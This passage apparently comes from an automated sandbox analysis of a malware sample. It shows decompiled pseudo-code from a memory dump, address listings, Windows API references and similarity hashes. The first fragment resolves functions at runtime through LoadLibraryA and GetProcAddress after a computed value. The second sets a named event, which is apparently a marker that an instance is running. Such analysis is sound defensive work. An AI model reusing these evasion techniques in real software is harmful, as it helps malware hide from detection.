														_v24 = _t110 - _t111 - _t113 + 0x38a890d5;
														_t110 =  *_t153 & 0x000000ff;
														_t153 =  &(_t153[1]);
														__eflags = _t110;
													} while (_t110 != 0);
													_t152 =  &_v24;
												}
											}
											_t147 = GetProcAddress(LoadLibraryA( &_v136), _t152);
										}
									}
								}
							} else {
								goto L7;
							}
							goto L23;
							L7:
							_t137 = _t137 + 4;
							_t148 =  &(_v20[2]);
							_t114 = E00802640(0, 1);
							_t164 = _t167 + 8;
							_t129 = _v36 - _t114;
						} while (_t129 <  *((intOrPtr*)(_v28 + 0x18)));
						_t147 = 0;
					}
				}
				L23:
				return _t147;
			}















































    0x0081f879
    0x0081f87c
    0x0081f87e
    0x0081f880
    0x0081f887
    0x0081f88c
    0x0081f88f
    0x0081f892
    0x0081f897
    0x0081f8a0
    0x0081f8a3
    0x0081f8cb
    0x0081f8cd
    0x0081f8d5
    0x0081f8ef
    0x0081f8f4
    0x0081f8f7
    0x0081f8f9
    0x0081f8fb
    0x0081f907
    0x0081f90b
    0x0081f90f
    0x0081f910
    0x0081f910
    0x0081f913
    0x0081f916
    0x0081f91d
    0x0081f928
    0x0081f92d
    0x0081f933
    0x0081f938
    0x0081f93a
    0x0081f93d
    0x0081f940
    0x0081f944
    0x0081f949
    0x0081f94c
    0x0081f953
    0x0081f958
    0x0081f959
    0x0081f940
    0x0081f95d
    0x0081f95f
    0x0081f966
    0x0081f96b
    0x0081f971
    0x0081f9b0
    0x0081f9c0
    0x0081f9de
    0x0081f9e4
    0x0081f9e7
    0x0081f9f4
    0x0081f9f9
    0x0081f9fc
    0x0081f9fe
    0x0081fa04
    0x0081fa09
    0x0081fa10
    0x0081fa12
    0x0081fa1a
    0x0081fa1c
    0x0081fa22
    0x0081fa26
    0x0081fa28
    0x0081fa2a
    0x0081fa2a
    0x0081fa30
    0x0081fa30
    0x0081fa37
    0x0081fa3c
    0x0081fa3d
    0x0081fa3d
    0x0081fa30
    0x0081fa41
    0x0081fa45
    0x0081fa48
    0x0081fa57
    0x0081fa68
    0x0081fa70
    0x0081fa7d
    0x0081fa92
    0x0081fa99
    0x0081fa9e
    0x0081faad
    0x0081fab2
    0x0081fab5
    0x0081fab7
    0x0081fb18
    0x0081fab9
    0x0081fabf
    0x0081fac2
    0x0081fac4
    0x0081fb1d
    0x0081fac6
    0x0081fac6
    0x0081fac6
    0x0081fad0
    0x0081fae0
    0x0081faed
    0x0081faf8
    0x0081fafd
    0x0081fb08
    0x0081fb0b
    0x0081fb0e
    0x0081fb0f
    0x0081fb0f
    0x0081fb13
    0x0081fb13
    0x0081fac4
    0x0081fb34
    0x0081fb34
    0x0081fa1c
    0x0081fa12
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0081f973
    0x0081f973
    0x0081f979
    0x0081f980
    0x0081f985
    0x0081f98b
    0x0081f990
    0x0081f999
    0x0081f999
    0x0081f897
    0x0081fb36
    0x0081fb3f

    APIs
    • LoadLibraryA.KERNEL32(0000642E), ref: 0081FB26
    • GetProcAddress.KERNEL32(00000000,?), ref: 0081FB2E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .d$l
    • API String ID: 2574300362-2610669624
    • Opcode ID: 3aa4616683255edeb566ab99bf56e8ea862b6c2c7247bcfff31106465dbe080c
    • Instruction ID: eb1c347fa50d395a30c02337f40a6af17cc1a2955b0877c22808fe9736ca1270
    • Opcode Fuzzy Hash: 3aa4616683255edeb566ab99bf56e8ea862b6c2c7247bcfff31106465dbe080c
    • Instruction Fuzzy Hash: 0A713BB6D001155BCB109FA8EC46BEE3B65FF15358F040074FA89E7383E6719A5587B2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0081FC90, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0081FC90(void* __eax) {
				char _v12;
				void* _t5;

				_t5 = CreateEventW(0, 1, 0, E0080F180(0x823ac4,  &_v12));
				if(_t5 != 0) {
					SetEvent(_t5);
					_t5 = CloseHandle(_t5);
				}
				SetLastError(0);
				return _t5;
			}





    0x0081fcad
    0x0081fcb5
    0x0081fcba
    0x0081fcc1
    0x0081fcc1
    0x0081fcc9
    0x0081fcd4

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00808C29,?,?,?,?,00802BA8), ref: 0081FCAD
    • SetEvent.KERNEL32(00000000,?,00808C29,?,?,?,?,00802BA8,?,?,?,?,?,?,?,0080A1E6), ref: 0081FCBA
    • CloseHandle.KERNEL32(00000000,?,00808C29,?,?,?,?,00802BA8,?,?,?,?,?,?,?,0080A1E6), ref: 0081FCC1
    • SetLastError.KERNEL32(00000000,?,00808C29,?,?,?,?,00802BA8,?,?,?,?,?,?,?,0080A1E6), ref: 0081FCC9
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Event$CloseCreateErrorHandleLast
    • String ID:
    • API String ID: 2055590504-0
    • Opcode ID: c4db36cea2b1e59a7b5bc49d9af322eb28750732ed13304920e8ac7b49824400
    • Instruction ID: dd5c32811c37ddedb98ba82b73686715a9a24d0e176ce968768f328aa4235d72
    • Opcode Fuzzy Hash: c4db36cea2b1e59a7b5bc49d9af322eb28750732ed13304920e8ac7b49824400
    • Instruction Fuzzy Hash: 7BE04F72A40614BBE62127A1BC1AFAA7A2CFF04796F044021FB0AD51C1DA59964586B6
    Uniqueness

    Uniqueness Score: -1.00%